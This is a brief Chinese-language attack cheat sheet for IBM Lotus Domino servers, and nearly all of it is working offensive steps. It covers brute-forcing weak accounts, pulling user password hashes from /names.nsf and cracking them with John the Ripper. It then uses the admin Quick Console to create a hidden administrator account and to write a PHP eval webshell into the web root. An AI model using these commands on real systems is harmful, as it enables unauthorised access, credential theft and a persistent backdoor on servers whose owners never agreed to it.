Domino 渗透相关
BURP抓包,暴力破解弱口令账户或者尝试admin/password
登录弱口令账户以后,访问/names.nsf /webadmin.nsf /admin4.nsf
读取所有用户HASH与NSF文件
读取HASH地址为:/names.nsf/$users?OpenView&Start=1&count=292
保存格式为用户名:hash (不包含括号)
使用kali里面的john 破解hash
john hash文件 --format=lotus5
或者
john hash文件 --format=dominosec
命令执行
使用管理员权限用户访问/webadmin.nsf记住文件目录位置,然后访问 Quick console
输入load cmd /c net user wooyun$ Wooyun@2016 /add > D:\lotus_xlgg\Domino\Data\domino\html\download\filesets\netuser1.txt
load cmd /c net localgroup administrators wooyun$ /add > D:\lotus_xlgg\Domino\Data\domino\html\download\filesets\netuser1.txt
http://网站/download/filesets/ipconfig.txt
写shell
load cmd /c echo ^<?php @eval($_POST['pass']);?^> > D:\Lotus\Domino\data\domino\html\download\filesets\netuser1.php